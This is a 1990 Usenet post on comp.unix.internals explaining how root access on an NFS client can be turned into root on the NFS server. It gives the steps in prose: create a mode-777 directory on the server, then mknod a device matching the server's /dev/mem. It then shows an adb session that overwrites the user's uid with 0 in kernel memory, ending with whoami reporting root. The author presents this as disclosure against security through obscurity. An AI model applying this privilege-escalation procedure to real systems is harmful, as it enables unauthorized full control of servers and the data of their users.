Path: utzoo!censor!geac!torsqnt!news-server.csri.toronto.edu!cs.utexas.edu!sun-barr!newstop!texsun!convex!convex.COM
From: tchrist@convex.COM (Tom Christiansen)
Newsgroups: comp.unix.internals
Subject: Re: becoming root via NFS
Message-ID: <111544@convex.convex.com>
Date: 16 Dec 90 23:13:06 GMT
References: <1990Dec7.171501.18028@mp.cs.niu.edu> <4627@pkmab.se> <4088@osc.COM>
Sender: news@convex.com
Reply-To: tchrist@convex.COM (Tom Christiansen)
Organization: CONVEX Software Development, Richardson, TX
Lines: 56

From the keyboard of strick@osc.com (henry strickland):
:In the normal NFS setup, making myself root on a workstation does not
:give me root priveleges on the filesystem of a remote NFS server which
:I can mount the partitions of.   But I can easily be any other user or
:any group I want on that remote partition, including daemon, bin, uucp,
:kmem, wheel, operator, audit, etc.    Since this is so easy, we have to
:set our goals to being root on the server.  ;-)   Now if any of these
:non-root users owns (or groups has w bits on) some file in the PATH of
:root (or one of the directories or superdirectories in the PATH), the
:trojan horse can ride.

It's really pretty easy to become root on the server if you can 
become root on the workstation.  Become a non-root user who can create
a directory.  Create a directory on the server that's mode 777.  Now
go back to root and go to this directory, which you can write although
the files will be owned by user ((unsigned short) -2).  Do a mknod 
giving it the major,minor numbers of /dev/mem on the server,
not the workstation.  Make it mode 666.  Return to the server as a normal
user, adb your new /dev/mem device and scribble at will.  My favorite 
scribble is to punch the uid of my shell to be 0 in the proc structure.

For example, here is some code that does that on my system:


    % whoami
    tchrist

    % pstat -tP $$                      <- find this guy's proc addr
                        PROC  S K   THREAD S  F ID    SLPQH    WCHAN  RESCHFP
    tcsh               3b9ab8 S 1   5a5760 s  2  0   24e0d0  a1eb000  b4f4d74

    % adb -w -k /vmunix personal_mem_device
    (adb) 3b9ab8+44/w                    <- now find his user addr
    0x3b9afc:       a1eb000
    (adb) 3b9ab8+58c/h                   <- check out our user id
    0x3ba048:       356
    (adb) ./h= 0                         <- setuid the way Real Programmers do it
    0x3ba048:      356     =       0
    (adb) $q

    % whoami
    root

Of course, finding the right offsets is a little tiny bit of work maybe,
but I've a program that C dumps structure offsets, so it's not too rough.

Some people are going to tell me I shouldn't have explained this, but 
that's not going to help anything.  Security through obscurity isn't.

Now you may better understand my .signature. :-)

--tom
--
Tom Christiansen		tchrist@convex.com	convex!tchrist
"With a kernel dive, all things are possible, but it sure makes it hard
 to look at yourself in the mirror the next morning."  -me